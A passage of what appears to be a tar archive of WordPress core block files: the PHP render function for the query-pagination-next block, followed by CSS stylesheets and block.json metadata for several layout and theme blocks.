 * @param WP_Block $block      Block instance.
 *
 * @return string Returns the next posts link for the query pagination.
 */
function render_block_core_query_pagination_next( $attributes, $content, $block ) {
	$page_key            = isset( $block->context['queryId'] ) ? 'query-' . $block->context['queryId'] . '-page' : 'query-page';
	$enhanced_pagination = isset( $block->context['enhancedPagination'] ) && $block->context['enhancedPagination'];
	$page                = empty( $_GET[ $page_key ] ) ? 1 : (int) $_GET[ $page_key ];
	$max_page            = isset( $block->context['query']['pages'] ) ? (int) $block->context['query']['pages'] : 0;

	$wrapper_attributes = get_block_wrapper_attributes();
	$show_label         = isset( $block->context['showLabel'] ) ? (bool) $block->context['showLabel'] : true;
	$default_label      = __( 'Next Page' );
	$label_text         = isset( $attributes['label'] ) && ! empty( $attributes['label'] ) ? esc_html( $attributes['label'] ) : $default_label;
	$label              = $show_label ? $label_text : '';
	$pagination_arrow   = get_query_pagination_arrow( $block, true );

	if ( ! $label ) {
		$wrapper_attributes .= ' aria-label="' . $label_text . '"';
	}
	if ( $pagination_arrow ) {
		$label .= $pagination_arrow;
	}
	$content = '';

	// Check if the pagination is for Query that inherits the global context.
	if ( isset( $block->context['query']['inherit'] ) && $block->context['query']['inherit'] ) {
		$filter_link_attributes = static function () use ( $wrapper_attributes ) {
			return $wrapper_attributes;
		};
		add_filter( 'next_posts_link_attributes', $filter_link_attributes );
		// Take into account if we have set a bigger `max page`
		// than what the query has.
		global $wp_query;
		if ( $max_page > $wp_query->max_num_pages ) {
			$max_page = $wp_query->max_num_pages;
		}
		$content = get_next_posts_link( $label, $max_page );
		remove_filter( 'next_posts_link_attributes', $filter_link_attributes );
	} elseif ( ! $max_page || $max_page > $page ) {
		$custom_query           = new WP_Query( build_query_vars_from_query_block( $block, $page ) );
		$custom_query_max_pages = (int) $custom_query->max_num_pages;
		if ( $custom_query_max_pages && $custom_query_max_pages !== $page ) {
			$content = sprintf(
				'<a href="%1$s" %2$s>%3$s</a>',
				esc_url( add_query_arg( $page_key, $page + 1 ) ),
				$wrapper_attributes,
				$label
			);
		}
		wp_reset_postdata(); // Restore original Post Data.
	}

	if ( $enhanced_pagination && isset( $content ) ) {
		$p = new WP_HTML_Tag_Processor( $content );
		if ( $p->next_tag(
			array(
				'tag_name'   => 'a',
				'class_name' => 'wp-block-query-pagination-next',
			)
		) ) {
			$p->set_attribute( 'data-wp-key', 'query-pagination-next' );
			$p->set_attribute( 'data-wp-on--click', 'core/query::actions.navigate' );
			$p->set_attribute( 'data-wp-on-async--mouseenter', 'core/query::actions.prefetch' );
			$p->set_attribute( 'data-wp-watch', 'core/query::callbacks.prefetch' );
			$content = $p->get_updated_html();
		}
	}

	return $content;
}

/**
 * Registers the `core/query-pagination-next` block on the server.
 *
 * @since 5.8.0
 */
function register_block_core_query_pagination_next() {
	register_block_type_from_metadata(
		__DIR__ . '/query-pagination-next',
		array(
			'render_callback' => 'render_block_core_query_pagination_next',
		)
	);
}
add_action( 'init', 'register_block_core_query_pagination_next' );
comment-template/style-rtl.css000060400000001011151330427370012462 0ustar00.wp-block-comment-template{
  box-sizing:border-box;
  list-style:none;
  margin-bottom:0;
  max-width:100%;
  padding:0;
}
.wp-block-comment-template li{
  clear:both;
}
.wp-block-comment-template ol{
  list-style:none;
  margin-bottom:0;
  max-width:100%;
  padding-right:2rem;
}
.wp-block-comment-template.alignleft{
  float:right;
}
.wp-block-comment-template.aligncenter{
  margin-left:auto;
  margin-right:auto;
  width:-moz-fit-content;
  width:fit-content;
}
.wp-block-comment-template.alignright{
  float:left;
}comment-template/style.css000060400000001010151330427370011662 0ustar00.wp-block-comment-template{
  box-sizing:border-box;
  list-style:none;
  margin-bottom:0;
  max-width:100%;
  padding:0;
}
.wp-block-comment-template li{
  clear:both;
}
.wp-block-comment-template ol{
  list-style:none;
  margin-bottom:0;
  max-width:100%;
  padding-left:2rem;
}
.wp-block-comment-template.alignleft{
  float:left;
}
.wp-block-comment-template.aligncenter{
  margin-left:auto;
  margin-right:auto;
  width:-moz-fit-content;
  width:fit-content;
}
.wp-block-comment-template.alignright{
  float:right;
}comment-template/block.json000060400000001676151330427370012017 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/comment-template",
	"title": "Comment Template",
	"category": "design",
	"parent": [ "core/comments" ],
	"description": "Contains the block elements used to display a comment, like the title, date, author, avatar and more.",
	"textdomain": "default",
	"usesContext": [ "postId" ],
	"supports": {
		"align": true,
		"html": false,
		"reusable": false,
		"spacing": {
			"margin": true,
			"padding": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"style": "wp-block-comment-template"
}
comment-template/style-rtl.min.css000060400000000710151330427370013251 0ustar00.wp-block-comment-template{box-sizing:border-box;list-style:none;margin-bottom:0;max-width:100%;padding:0}.wp-block-comment-template li{clear:both}.wp-block-comment-template ol{list-style:none;margin-bottom:0;max-width:100%;padding-right:2rem}.wp-block-comment-template.alignleft{float:right}.wp-block-comment-template.aligncenter{margin-left:auto;margin-right:auto;width:-moz-fit-content;width:fit-content}.wp-block-comment-template.alignright{float:left}comment-template/style.min.css000060400000000707151330427370012460 0ustar00.wp-block-comment-template{box-sizing:border-box;list-style:none;margin-bottom:0;max-width:100%;padding:0}.wp-block-comment-template li{clear:both}.wp-block-comment-template ol{list-style:none;margin-bottom:0;max-width:100%;padding-left:2rem}.wp-block-comment-template.alignleft{float:left}.wp-block-comment-template.aligncenter{margin-left:auto;margin-right:auto;width:-moz-fit-content;width:fit-content}.wp-block-comment-template.alignright{float:right}query-pagination/editor.css000060400000001302151330427370012035 0ustar00.wp-block[data-align=center]>.wp-block-query-pagination{
  justify-content:center;
}

.editor-styles-wrapper .wp-block-query-pagination{
  max-width:100%;
}
.editor-styles-wrapper .wp-block-query-pagination.block-editor-block-list__layout{
  margin:0;
}

.wp-block-query-pagination>.wp-block-query-pagination-next,.wp-block-query-pagination>.wp-block-query-pagination-numbers,.wp-block-query-pagination>.wp-block-query-pagination-previous{
  margin:.5em .5em .5em 0;
}
.wp-block-query-pagination>.wp-block-query-pagination-next:last-child,.wp-block-query-pagination>.wp-block-query-pagination-numbers:last-child,.wp-block-query-pagination>.wp-block-query-pagination-previous:last-child{
  margin-right:0;
}query-pagination/style-rtl.min.css000060400000002303151330427370013272 0ustar00.wp-block-query-pagination>.wp-block-query-pagination-next,.wp-block-query-pagination>.wp-block-query-pagination-numbers,.wp-block-query-pagination>.wp-block-query-pagination-previous{margin-bottom:.5em;margin-right:.5em}.wp-block-query-pagination>.wp-block-query-pagination-next:last-child,.wp-block-query-pagination>.wp-block-query-pagination-numbers:last-child,.wp-block-query-pagination>.wp-block-query-pagination-previous:last-child{margin-right:0}.wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-next:last-of-type{margin-inline-start:auto}.wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-previous:first-child{margin-inline-end:auto}.wp-block-query-pagination .wp-block-query-pagination-previous-arrow{display:inline-block;margin-left:1ch}.wp-block-query-pagination .wp-block-query-pagination-previous-arrow:not(.is-arrow-chevron){transform:scaleX(-1)}.wp-block-query-pagination .wp-block-query-pagination-next-arrow{display:inline-block;margin-right:1ch}.wp-block-query-pagination .wp-block-query-pagination-next-arrow:not(.is-arrow-chevron){transform:scaleX(-1)}.wp-block-query-pagination.aligncenter{justify-content:center}query-pagination/editor.min.css000060400000001243151330427370012623 0ustar00.wp-block[data-align=center]>.wp-block-query-pagination{justify-content:center}.editor-styles-wrapper .wp-block-query-pagination{max-width:100%}.editor-styles-wrapper .wp-block-query-pagination.block-editor-block-list__layout{margin:0}.wp-block-query-pagination>.wp-block-query-pagination-next,.wp-block-query-pagination>.wp-block-query-pagination-numbers,.wp-block-query-pagination>.wp-block-query-pagination-previous{margin:.5em .5em .5em 0}.wp-block-query-pagination>.wp-block-query-pagination-next:last-child,.wp-block-query-pagination>.wp-block-query-pagination-numbers:last-child,.wp-block-query-pagination>.wp-block-query-pagination-previous:last-child{margin-right:0}query-pagination/style.min.css000060400000002301151330427370012471 0ustar00.wp-block-query-pagination>.wp-block-query-pagination-next,.wp-block-query-pagination>.wp-block-query-pagination-numbers,.wp-block-query-pagination>.wp-block-query-pagination-previous{margin-bottom:.5em;margin-right:.5em}.wp-block-query-pagination>.wp-block-query-pagination-next:last-child,.wp-block-query-pagination>.wp-block-query-pagination-numbers:last-child,.wp-block-query-pagination>.wp-block-query-pagination-previous:last-child{margin-right:0}.wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-next:last-of-type{margin-inline-start:auto}.wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-previous:first-child{margin-inline-end:auto}.wp-block-query-pagination .wp-block-query-pagination-previous-arrow{display:inline-block;margin-right:1ch}.wp-block-query-pagination .wp-block-query-pagination-previous-arrow:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-query-pagination .wp-block-query-pagination-next-arrow{display:inline-block;margin-left:1ch}.wp-block-query-pagination .wp-block-query-pagination-next-arrow:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-query-pagination.aligncenter{justify-content:center}query-pagination/block.json000060400000003053151330427370012027 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/query-pagination",
	"title": "Pagination",
	"category": "theme",
	"ancestor": [ "core/query" ],
	"allowedBlocks": [
		"core/query-pagination-previous",
		"core/query-pagination-numbers",
		"core/query-pagination-next"
	],
	"description": "Displays a paginated navigation to next/previous set of posts, when applicable.",
	"textdomain": "default",
	"attributes": {
		"paginationArrow": {
			"type": "string",
			"default": "none"
		},
		"showLabel": {
			"type": "boolean",
			"default": true
		}
	},
	"usesContext": [ "queryId", "query" ],
	"providesContext": {
		"paginationArrow": "paginationArrow",
		"showLabel": "showLabel"
	},
	"supports": {
		"align": true,
		"reusable": false,
		"html": false,
		"color": {
			"gradients": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true,
				"link": true
			}
		},
		"layout": {
			"allowSwitching": false,
			"allowInheriting": false,
			"default": {
				"type": "flex"
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-query-pagination-editor",
	"style": "wp-block-query-pagination"
}
query-pagination/style-rtl.css000060400000002403151330427370012511 0ustar00.wp-block-query-pagination>.wp-block-query-pagination-next,.wp-block-query-pagination>.wp-block-query-pagination-numbers,.wp-block-query-pagination>.wp-block-query-pagination-previous{
  margin-bottom:.5em;
  margin-right:.5em;
}
.wp-block-query-pagination>.wp-block-query-pagination-next:last-child,.wp-block-query-pagination>.wp-block-query-pagination-numbers:last-child,.wp-block-query-pagination>.wp-block-query-pagination-previous:last-child{
  margin-right:0;
}
.wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-next:last-of-type{
  margin-inline-start:auto;
}
.wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-previous:first-child{
  margin-inline-end:auto;
}
.wp-block-query-pagination .wp-block-query-pagination-previous-arrow{
  display:inline-block;
  margin-left:1ch;
}
.wp-block-query-pagination .wp-block-query-pagination-previous-arrow:not(.is-arrow-chevron){
  transform:scaleX(-1);;
}
.wp-block-query-pagination .wp-block-query-pagination-next-arrow{
  display:inline-block;
  margin-right:1ch;
}
.wp-block-query-pagination .wp-block-query-pagination-next-arrow:not(.is-arrow-chevron){
  transform:scaleX(-1);;
}
.wp-block-query-pagination.aligncenter{
  justify-content:center;
}query-pagination/editor-rtl.css000060400000001345151330427370012643 0ustar00.wp-block[data-align=center]>.wp-block-query-pagination{
  justify-content:center;
}

.editor-styles-wrapper .wp-block-query-pagination{
  max-width:100%;
}
.editor-styles-wrapper .wp-block-query-pagination.block-editor-block-list__layout{
  margin:0;
}

.wp-block-query-pagination>.wp-block-query-pagination-next,.wp-block-query-pagination>.wp-block-query-pagination-numbers,.wp-block-query-pagination>.wp-block-query-pagination-previous{
  margin-bottom:.5em;
  margin-right:.5em;
  margin-top:.5em;
}
.wp-block-query-pagination>.wp-block-query-pagination-next:last-child,.wp-block-query-pagination>.wp-block-query-pagination-numbers:last-child,.wp-block-query-pagination>.wp-block-query-pagination-previous:last-child{
  margin-right:0;
}query-pagination/editor-rtl.min.css000060400000001300151330427370013414 0ustar00.wp-block[data-align=center]>.wp-block-query-pagination{justify-content:center}.editor-styles-wrapper .wp-block-query-pagination{max-width:100%}.editor-styles-wrapper .wp-block-query-pagination.block-editor-block-list__layout{margin:0}.wp-block-query-pagination>.wp-block-query-pagination-next,.wp-block-query-pagination>.wp-block-query-pagination-numbers,.wp-block-query-pagination>.wp-block-query-pagination-previous{margin-bottom:.5em;margin-right:.5em;margin-top:.5em}.wp-block-query-pagination>.wp-block-query-pagination-next:last-child,.wp-block-query-pagination>.wp-block-query-pagination-numbers:last-child,.wp-block-query-pagination>.wp-block-query-pagination-previous:last-child{margin-right:0}query-pagination/style.css000060400000002377151330427370011724 0ustar00.wp-block-query-pagination>.wp-block-query-pagination-next,.wp-block-query-pagination>.wp-block-query-pagination-numbers,.wp-block-query-pagination>.wp-block-query-pagination-previous{
  margin-bottom:.5em;
  margin-right:.5em;
}
.wp-block-query-pagination>.wp-block-query-pagination-next:last-child,.wp-block-query-pagination>.wp-block-query-pagination-numbers:last-child,.wp-block-query-pagination>.wp-block-query-pagination-previous:last-child{
  margin-right:0;
}
.wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-next:last-of-type{
  margin-inline-start:auto;
}
.wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-previous:first-child{
  margin-inline-end:auto;
}
.wp-block-query-pagination .wp-block-query-pagination-previous-arrow{
  display:inline-block;
  margin-right:1ch;
}
.wp-block-query-pagination .wp-block-query-pagination-previous-arrow:not(.is-arrow-chevron){
  transform:scaleX(1);
}
.wp-block-query-pagination .wp-block-query-pagination-next-arrow{
  display:inline-block;
  margin-left:1ch;
}
.wp-block-query-pagination .wp-block-query-pagination-next-arrow:not(.is-arrow-chevron){
  transform:scaleX(1);
}
.wp-block-query-pagination.aligncenter{
  justify-content:center;
}post-author/editor-rtl.css000064400000000246151330427370011637 0ustar00.wp-block-post-author__inspector-settings .components-base-control,.wp-block-post-author__inspector-settings .components-base-control:last-child{
  margin-bottom:0;
}post-author/style.css000060400000000605151330427370010705 0ustar00.wp-block-post-author{
  display:flex;
  flex-wrap:wrap;
}
.wp-block-post-author__byline{
  font-size:.5em;
  margin-bottom:0;
  margin-top:0;
  width:100%;
}
.wp-block-post-author__avatar{
  margin-right:1em;
}
.wp-block-post-author__bio{
  font-size:.7em;
  margin-bottom:.7em;
}
.wp-block-post-author__content{
  flex-basis:0;
  flex-grow:1;
}
.wp-block-post-author__name{
  margin:0;
}post-author/style-rtl.css000060400000000604151330427370011503 0ustar00.wp-block-post-author{
  display:flex;
  flex-wrap:wrap;
}
.wp-block-post-author__byline{
  font-size:.5em;
  margin-bottom:0;
  margin-top:0;
  width:100%;
}
.wp-block-post-author__avatar{
  margin-left:1em;
}
.wp-block-post-author__bio{
  font-size:.7em;
  margin-bottom:.7em;
}
.wp-block-post-author__content{
  flex-basis:0;
  flex-grow:1;
}
.wp-block-post-author__name{
  margin:0;
}post-author/editor.css000064400000000246151330427370011040 0ustar00.wp-block-post-author__inspector-settings .components-base-control,.wp-block-post-author__inspector-settings .components-base-control:last-child{
  margin-bottom:0;
}post-author/editor.min.css000064400000000241151330427370011615 0ustar00.wp-block-post-author__inspector-settings .components-base-control,.wp-block-post-author__inspector-settings .components-base-control:last-child{margin-bottom:0}post-author/style-rtl.min.css000060400000000517151330427370012270 0ustar00.wp-block-post-author{display:flex;flex-wrap:wrap}.wp-block-post-author__byline{font-size:.5em;margin-bottom:0;margin-top:0;width:100%}.wp-block-post-author__avatar{margin-left:1em}.wp-block-post-author__bio{font-size:.7em;margin-bottom:.7em}.wp-block-post-author__content{flex-basis:0;flex-grow:1}.wp-block-post-author__name{margin:0}post-author/editor-rtl.min.css000064400000000241151330427370012414 0ustar00.wp-block-post-author__inspector-settings .components-base-control,.wp-block-post-author__inspector-settings .components-base-control:last-child{margin-bottom:0}post-author/style.min.css000060400000000520151330427370011463 0ustar00.wp-block-post-author{display:flex;flex-wrap:wrap}.wp-block-post-author__byline{font-size:.5em;margin-bottom:0;margin-top:0;width:100%}.wp-block-post-author__avatar{margin-right:1em}.wp-block-post-author__bio{font-size:.7em;margin-bottom:.7em}.wp-block-post-author__content{flex-basis:0;flex-grow:1}.wp-block-post-author__name{margin:0}post-author/block.json000060400000002647151330427370011030 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/post-author",
	"title": "Author",
	"category": "theme",
	"description": "Display post author details such as name, avatar, and bio.",
	"textdomain": "default",
	"attributes": {
		"textAlign": {
			"type": "string"
		},
		"avatarSize": {
			"type": "number",
			"default": 48
		},
		"showAvatar": {
			"type": "boolean",
			"default": true
		},
		"showBio": {
			"type": "boolean"
		},
		"byline": {
			"type": "string"
		},
		"isLink": {
			"type": "boolean",
			"default": false
		},
		"linkTarget": {
			"type": "string",
			"default": "_self"
		}
	},
	"usesContext": [ "postType", "postId", "queryId" ],
	"supports": {
		"html": false,
		"spacing": {
			"margin": true,
			"padding": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"color": {
			"gradients": true,
			"link": true,
			"__experimentalDuotone": ".wp-block-post-author__avatar img",
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"style": "wp-block-post-author"
}
columns/editor-rtl.css000060400000000240151330427370011020 0ustar00.wp-block-columns :where(.wp-block){
  margin-left:0;
  margin-right:0;
  max-width:none;
}

html :where(.wp-block-column){
  margin-bottom:0;
  margin-top:0;
}columns/editor.css000060400000000240151330427370010221 0ustar00.wp-block-columns :where(.wp-block){
  margin-left:0;
  margin-right:0;
  max-width:none;
}

html :where(.wp-block-column){
  margin-bottom:0;
  margin-top:0;
}columns/style-rtl.css000060400000003317151330427370010702 0ustar00.wp-block-columns{
  align-items:normal !important;
  box-sizing:border-box;
  display:flex;
  flex-wrap:wrap !important;
}
@media (min-width:782px){
  .wp-block-columns{
    flex-wrap:nowrap !important;
  }
}
.wp-block-columns.are-vertically-aligned-top{
  align-items:flex-start;
}
.wp-block-columns.are-vertically-aligned-center{
  align-items:center;
}
.wp-block-columns.are-vertically-aligned-bottom{
  align-items:flex-end;
}
@media (max-width:781px){
  .wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{
    flex-basis:100% !important;
  }
}
@media (min-width:782px){
  .wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{
    flex-basis:0;
    flex-grow:1;
  }
  .wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column[style*=flex-basis]{
    flex-grow:0;
  }
}
.wp-block-columns.is-not-stacked-on-mobile{
  flex-wrap:nowrap !important;
}
.wp-block-columns.is-not-stacked-on-mobile>.wp-block-column{
  flex-basis:0;
  flex-grow:1;
}
.wp-block-columns.is-not-stacked-on-mobile>.wp-block-column[style*=flex-basis]{
  flex-grow:0;
}

:where(.wp-block-columns){
  margin-bottom:1.75em;
}

:where(.wp-block-columns.has-background){
  padding:1.25em 2.375em;
}

.wp-block-column{
  flex-grow:1;
  min-width:0;
  overflow-wrap:break-word;
  word-break:break-word;
}
.wp-block-column.is-vertically-aligned-top{
  align-self:flex-start;
}
.wp-block-column.is-vertically-aligned-center{
  align-self:center;
}
.wp-block-column.is-vertically-aligned-bottom{
  align-self:flex-end;
}
.wp-block-column.is-vertically-aligned-stretch{
  align-self:stretch;
}
.wp-block-column.is-vertically-aligned-bottom,.wp-block-column.is-vertically-aligned-center,.wp-block-column.is-vertically-aligned-top{
  width:100%;
}columns/editor-rtl.min.css000060400000000213151330427370011602 0ustar00.wp-block-columns :where(.wp-block){margin-left:0;margin-right:0;max-width:none}html :where(.wp-block-column){margin-bottom:0;margin-top:0}columns/style-rtl.min.css000060400000003036151330427370011462 0ustar00.wp-block-columns{align-items:normal!important;box-sizing:border-box;display:flex;flex-wrap:wrap!important}@media (min-width:782px){.wp-block-columns{flex-wrap:nowrap!important}}.wp-block-columns.are-vertically-aligned-top{align-items:flex-start}.wp-block-columns.are-vertically-aligned-center{align-items:center}.wp-block-columns.are-vertically-aligned-bottom{align-items:flex-end}@media (max-width:781px){.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{flex-basis:100%!important}}@media (min-width:782px){.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{flex-basis:0;flex-grow:1}.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column[style*=flex-basis]{flex-grow:0}}.wp-block-columns.is-not-stacked-on-mobile{flex-wrap:nowrap!important}.wp-block-columns.is-not-stacked-on-mobile>.wp-block-column{flex-basis:0;flex-grow:1}.wp-block-columns.is-not-stacked-on-mobile>.wp-block-column[style*=flex-basis]{flex-grow:0}:where(.wp-block-columns){margin-bottom:1.75em}:where(.wp-block-columns.has-background){padding:1.25em 2.375em}.wp-block-column{flex-grow:1;min-width:0;overflow-wrap:break-word;word-break:break-word}.wp-block-column.is-vertically-aligned-top{align-self:flex-start}.wp-block-column.is-vertically-aligned-center{align-self:center}.wp-block-column.is-vertically-aligned-bottom{align-self:flex-end}.wp-block-column.is-vertically-aligned-stretch{align-self:stretch}.wp-block-column.is-vertically-aligned-bottom,.wp-block-column.is-vertically-aligned-center,.wp-block-column.is-vertically-aligned-top{width:100%}columns/editor.min.css000060400000000213151330427370011003 0ustar00.wp-block-columns :where(.wp-block){margin-left:0;margin-right:0;max-width:none}html :where(.wp-block-column){margin-bottom:0;margin-top:0}columns/style.css000060400000003317151330427370010103 0ustar00.wp-block-columns{
  align-items:normal !important;
  box-sizing:border-box;
  display:flex;
  flex-wrap:wrap !important;
}
@media (min-width:782px){
  .wp-block-columns{
    flex-wrap:nowrap !important;
  }
}
.wp-block-columns.are-vertically-aligned-top{
  align-items:flex-start;
}
.wp-block-columns.are-vertically-aligned-center{
  align-items:center;
}
.wp-block-columns.are-vertically-aligned-bottom{
  align-items:flex-end;
}
@media (max-width:781px){
  .wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{
    flex-basis:100% !important;
  }
}
@media (min-width:782px){
  .wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{
    flex-basis:0;
    flex-grow:1;
  }
  .wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column[style*=flex-basis]{
    flex-grow:0;
  }
}
.wp-block-columns.is-not-stacked-on-mobile{
  flex-wrap:nowrap !important;
}
.wp-block-columns.is-not-stacked-on-mobile>.wp-block-column{
  flex-basis:0;
  flex-grow:1;
}
.wp-block-columns.is-not-stacked-on-mobile>.wp-block-column[style*=flex-basis]{
  flex-grow:0;
}

:where(.wp-block-columns){
  margin-bottom:1.75em;
}

:where(.wp-block-columns.has-background){
  padding:1.25em 2.375em;
}

.wp-block-column{
  flex-grow:1;
  min-width:0;
  overflow-wrap:break-word;
  word-break:break-word;
}
.wp-block-column.is-vertically-aligned-top{
  align-self:flex-start;
}
.wp-block-column.is-vertically-aligned-center{
  align-self:center;
}
.wp-block-column.is-vertically-aligned-bottom{
  align-self:flex-end;
}
.wp-block-column.is-vertically-aligned-stretch{
  align-self:stretch;
}
.wp-block-column.is-vertically-aligned-bottom,.wp-block-column.is-vertically-aligned-center,.wp-block-column.is-vertically-aligned-top{
  width:100%;
}columns/block.json000060400000003671151330427370010221 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/columns",
	"title": "Columns",
	"category": "design",
	"allowedBlocks": [ "core/column" ],
	"description": "Display content in multiple columns, with blocks added to each column.",
	"textdomain": "default",
	"attributes": {
		"verticalAlignment": {
			"type": "string"
		},
		"isStackedOnMobile": {
			"type": "boolean",
			"default": true
		},
		"templateLock": {
			"type": [ "string", "boolean" ],
			"enum": [ "all", "insert", "contentOnly", false ]
		}
	},
	"supports": {
		"anchor": true,
		"align": [ "wide", "full" ],
		"html": false,
		"color": {
			"gradients": true,
			"link": true,
			"heading": true,
			"button": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"spacing": {
			"blockGap": {
				"__experimentalDefault": "2em",
				"sides": [ "horizontal", "vertical" ]
			},
			"margin": [ "top", "bottom" ],
			"padding": true,
			"__experimentalDefaultControls": {
				"padding": true,
				"blockGap": true
			}
		},
		"layout": {
			"allowSwitching": false,
			"allowInheriting": false,
			"allowEditing": false,
			"default": {
				"type": "flex",
				"flexWrap": "nowrap"
			}
		},
		"__experimentalBorder": {
			"color": true,
			"radius": true,
			"style": true,
			"width": true,
			"__experimentalDefaultControls": {
				"color": true,
				"radius": true,
				"style": true,
				"width": true
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		},
		"shadow": true
	},
	"editorStyle": "wp-block-columns-editor",
	"style": "wp-block-columns"
}
columns/style.min.css000060400000003036151330427370010663 0ustar00.wp-block-columns{align-items:normal!important;box-sizing:border-box;display:flex;flex-wrap:wrap!important}@media (min-width:782px){.wp-block-columns{flex-wrap:nowrap!important}}.wp-block-columns.are-vertically-aligned-top{align-items:flex-start}.wp-block-columns.are-vertically-aligned-center{align-items:center}.wp-block-columns.are-vertically-aligned-bottom{align-items:flex-end}@media (max-width:781px){.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{flex-basis:100%!important}}@media (min-width:782px){.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{flex-basis:0;flex-grow:1}.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column[style*=flex-basis]{flex-grow:0}}.wp-block-columns.is-not-stacked-on-mobile{flex-wrap:nowrap!important}.wp-block-columns.is-not-stacked-on-mobile>.wp-block-column{flex-basis:0;flex-grow:1}.wp-block-columns.is-not-stacked-on-mobile>.wp-block-column[style*=flex-basis]{flex-grow:0}:where(.wp-block-columns){margin-bottom:1.75em}:where(.wp-block-columns.has-background){padding:1.25em 2.375em}.wp-block-column{flex-grow:1;min-width:0;overflow-wrap:break-word;word-break:break-word}.wp-block-column.is-vertically-aligned-top{align-self:flex-start}.wp-block-column.is-vertically-aligned-center{align-self:center}.wp-block-column.is-vertically-aligned-bottom{align-self:flex-end}.wp-block-column.is-vertically-aligned-stretch{align-self:stretch}.wp-block-column.is-vertically-aligned-bottom,.wp-block-column.is-vertically-aligned-center,.wp-block-column.is-vertically-aligned-top{width:100%}post-content/block.json000060400000001761151330427370011174 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/post-content",
	"title": "Content",
	"category": "theme",
	"description": "Displays the contents of a post or page.",
	"textdomain": "default",
	"usesContext": [ "postId", "postType", "queryId" ],
	"supports": {
		"align": [ "wide", "full" ],
		"html": false,
		"layout": true,
		"dimensions": {
			"minHeight": true
		},
		"spacing": {
			"blockGap": true
		},
		"color": {
			"gradients": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": false,
				"text": false
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		}
	},
	"editorStyle": "wp-block-post-content-editor"
}
post-content/style.css000064400000000056151330427370011061 0ustar00.wp-block-post-content{
  display:flow-root;
}post-content/style-rtl.min.css000064400000000051151330427370012435 0ustar00.wp-block-post-content{display:flow-root}post-content/style.min.css000064400000000051151330427370011636 0ustar00.wp-block-post-content{display:flow-root}post-content/style-rtl.css000064400000000056151330427370011660 0ustar00.wp-block-post-content{
  display:flow-root;
}avatar/style-rtl.css000060400000000233151330427370010472 0ustar00.wp-block-avatar{
  line-height:0;
}
.wp-block-avatar,.wp-block-avatar img{
  box-sizing:border-box;
}
.wp-block-avatar.aligncenter{
  text-align:center;
}avatar/editor-rtl.min.css000060400000000167151330427370011410 0ustar00.wp-block-avatar__image img{width:100%}.wp-block-avatar.aligncenter .components-resizable-box__container{margin:0 auto}avatar/editor-rtl.css000060400000000203151330427370010615 0ustar00.wp-block-avatar__image img{
  width:100%;
}

.wp-block-avatar.aligncenter .components-resizable-box__container{
  margin:0 auto;
}avatar/style.css000060400000000233151330427370007673 0ustar00.wp-block-avatar{
  line-height:0;
}
.wp-block-avatar,.wp-block-avatar img{
  box-sizing:border-box;
